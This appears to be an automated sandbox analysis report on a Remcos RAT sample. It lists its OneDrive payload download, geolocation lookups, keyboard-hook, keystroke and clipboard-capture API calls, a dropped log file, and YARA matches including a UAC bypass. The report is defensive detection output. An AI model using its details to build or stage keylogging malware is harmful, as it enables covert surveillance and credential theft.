                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_0467B380
                  Source: global trafficHTTP traffic detected: GET /download?resid=38773C188FECDED2%21107&authkey=!APdTZ0yd8fEkIVs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: unknownDNS traffic detected: queries for: onedrive.live.com
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: colorcpl.exe, 00000005.00000003.2049864957.000000000046A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                  Source: colorcpl.exe, 00000005.00000003.2049864957.000000000046A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/#Y
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.00000000003E4000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmp, SndVol.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: colorcpl.exe, 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpJ6
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpX
                  Source: colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpc6
                  Source: colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpm6
                  Source: colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp~6
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gjc1pa.dm.files.1drv.com/
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gjc1pa.dm.files.1drv.com/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WShCc-
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gjc1pa.dm.files.1drv.com/y4mpj9fRwfOnuyzM7YwI58jRvZ-dYfMjomP1KUnTARA567zRfUcLOtOoq9VQbjgVxqr
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gjc1pa.dm.files.1drv.com:443/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WS
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/J
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013C40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=38773C188FECDED2%21107&authkey=
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49705 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466A2B8 SetWindowsHookExA 0000000D,0466A2A4,000000005_2_0466A2B8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466B70E OpenClipboard,GetClipboardData,CloseClipboard,5_2_0466B70E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046768C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_046768C1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6468C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_1C6468C1
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466B70E OpenClipboard,GetClipboardData,CloseClipboard,5_2_0466B70E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,5_2_0466A3E0

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\ffrrdds\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467C9E2 SystemParametersInfoW,5_2_0467C9E2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C64C9E2 SystemParametersInfoW,8_2_1C64C9E2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
